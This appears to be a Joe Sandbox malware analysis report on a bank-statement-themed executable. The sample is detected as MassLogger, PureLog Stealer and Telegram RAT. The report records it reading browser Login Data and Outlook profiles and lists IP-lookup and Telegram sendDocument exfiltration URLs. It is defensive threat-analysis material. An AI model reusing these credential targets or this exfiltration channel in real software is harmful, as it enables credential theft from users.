Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Queries volume information: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Queries volume information: C:\Users\user\AppData\Roaming\bAZAANr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Queries volume information: C:\Users\user\AppData\Roaming\bAZAANr.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 5788, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.4fd0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.4fd0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2160882311.0000000004FD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 5788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bAZAANr.exe PID: 7480, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Halkbank_Ekstre_20241022_081224_563756.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\AppData\Roaming\bAZAANr.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 15.2.bAZAANr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.4557287584.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4555924157.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 5788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 3924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bAZAANr.exe PID: 7480, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 5788, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.4fd0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.4fd0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2160882311.0000000004FD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.3973168.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank_Ekstre_20241022_081224_563756.exe.37d5808.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Halkbank_Ekstre_20241022_081224_563756.exe PID: 5788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bAZAANr.exe PID: 7480, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Halkbank_Ekstre_20241022_081224_563756.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeKeylogger
Halkbank_Ekstre_20241022_081224_563756.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\bAZAANr.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\bAZAANr.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeKeylogger

Source	Detection	Scanner	Label
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	true	unknown
checkip.dyndns.com	132.226.247.73	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/173.254.250.71	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.comd	Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.71d	Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org/q	Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4552175226.0000000000412000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://reallyfreegeoip.orgd	Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://tempuri.org/DataSet1.xsd	Halkbank_Ekstre_20241022_081224_563756.exe, bAZAANr.exe.0.dr	false		unknown
http://reallyfreegeoip.org	Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.orgd	Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/173.254.250.71l	Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org	Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/d	Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2153033541.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000A.00000002.2226559280.0000000002981000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.0000000002981000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	Halkbank_Ekstre_20241022_081224_563756.exe, bAZAANr.exe.0.dr	false	URL Reputation: safe	unknown
https://api.telegram.org/bot-/sendDocument?chat_id=	Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4552175226.0000000000412000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/	Halkbank_Ekstre_20241022_081224_563756.exe, 00000000.00000002.2155425929.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20241022_081224_563756.exe, 00000009.00000002.4555924157.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4557287584.00000000029FE000.00000004.00000800.00020000.00000000.sdmp, bAZAANr.exe, 0000000F.00000002.4552175226.0000000000412000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	reallyfreegeoip.org	European Union		13335	CLOUDFLARENETUS	true
132.226.247.73	checkip.dyndns.com	United States		16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541087
Start date and time:	2024-10-24 11:59:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
